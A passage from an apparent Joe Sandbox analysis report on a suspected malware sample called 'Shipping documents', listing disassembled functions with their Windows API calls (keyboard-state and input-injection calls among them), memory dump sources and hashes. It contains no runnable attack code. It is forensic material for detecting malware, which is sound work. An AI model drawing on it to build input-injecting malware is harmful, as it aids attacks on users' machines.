                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 1612042205-0
                                                                                                          • Opcode ID: de986be264bc4095e11606319f6bc53bb2fe9b52cfcfc757ffd23d2b2712e847
                                                                                                          • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                                                                          • Opcode Fuzzy Hash: de986be264bc4095e11606319f6bc53bb2fe9b52cfcfc757ffd23d2b2712e847
                                                                                                          • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                                                                          Function 0044F1D3 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 422COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove_strncmp
                                                                                                          • String ID: >$U$\
                                                                                                          • API String ID: 2666721431-237099441
                                                                                                          • Opcode ID: 994491dbf5b58f6e61d1652d7d37ee4df9314aaeb5249f187bfdd15a9c44ea64
                                                                                                          • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                                                                          • Opcode Fuzzy Hash: 994491dbf5b58f6e61d1652d7d37ee4df9314aaeb5249f187bfdd15a9c44ea64
                                                                                                          • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                                                                          Function 0044C514 Relevance: 9.2, APIs: 6, Instructions: 163windowkeyboardCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetKeyboardState.USER32(?), ref: 0044C570
                                                                                                          • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                                                                          • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                                                                          • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                                                                          • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                                                                          • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessagePost$KeyboardState$InputSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 2221674350-0
                                                                                                          • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                                          • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                                                                          • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                                          • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                                                                                          Function 00444BFC Relevance: 9.2, APIs: 6, Instructions: 163COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcscpy$_wcscat
                                                                                                          • String ID:
                                                                                                          • API String ID: 2037614760-0
                                                                                                          • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                                                          • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                                                                          • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                                                          • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                                                                          Function 00451B42 Relevance: 9.1, APIs: 6, Instructions: 144memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                          • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                          • VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                                                                          • VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                                                                          • VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$Copy$AllocClearErrorLastString
                                                                                                          • String ID:
                                                                                                          • API String ID: 960795272-0
                                                                                                          • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                                                          • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                                                                          • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                                                          • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                                                                          Function 00447BA8 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                                                          • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                                                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                                                          • EndPaint.USER32(?,?), ref: 00447D13
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 4189319755-0
                                                                                                          • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                                          • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                                                                          • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                                          • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                                                                          Function 0044900D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                                                                          • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                                                                          • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$LongWindow$InvalidateRect
                                                                                                          • String ID:
                                                                                                          • API String ID: 1976402638-0
                                                                                                          • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                                                          • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                                                                          • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                                                          • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                                                                          Function 00440A0D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                                                                          • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                                                                          • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                                                                          • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                                                                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Show$Enable$MessageSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 642888154-0
                                                                                                          • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                                          • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                                                                          • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                                          • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                                                                          Function 0047974B Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 349COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$Copy$ClearErrorLast
                                                                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                                                                          • API String ID: 2487901850-572801152
                                                                                                          • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                                          • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                                                                          • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                                          • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                                                                          Function 00441078 Relevance: 9.1, APIs: 6, Instructions: 86COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                          • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                                                                          • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                          • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                                                                          Function 00471A38 Relevance: 9.1, APIs: 6, Instructions: 79windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                                                                          • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                                                                          • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                                                                          • SendMessageW.USER32 ref: 00471AE3
                                                                                                          • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                                                                          • String ID:
                                                                                                          • API String ID: 3611059338-0
                                                                                                          • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                                          • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                                                                          • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                                          • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                                                                          Function 00455616 Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DestroyWindow$DeleteObject$IconMove
                                                                                                          • String ID:
                                                                                                          • API String ID: 1640429340-0
                                                                                                          • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                                          • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                                                                          • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                                          • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                                                                          Function 0044389A Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                          • _wcslen.LIBCMT ref: 004438CD
                                                                                                          • _wcslen.LIBCMT ref: 004438E6
                                                                                                          • _wcstok.LIBCMT ref: 004438F8
                                                                                                          • _wcslen.LIBCMT ref: 0044390C
                                                                                                          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                                                                          • _wcstok.LIBCMT ref: 00443931
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 3632110297-0
                                                                                                          • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                                                          • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                                                                          • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                                                          • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                                                                          Function 00455168 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 752480666-0
                                                                                                          • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                                                          • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                                                                          • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                                                          • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                                                                          Function 004552FA Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
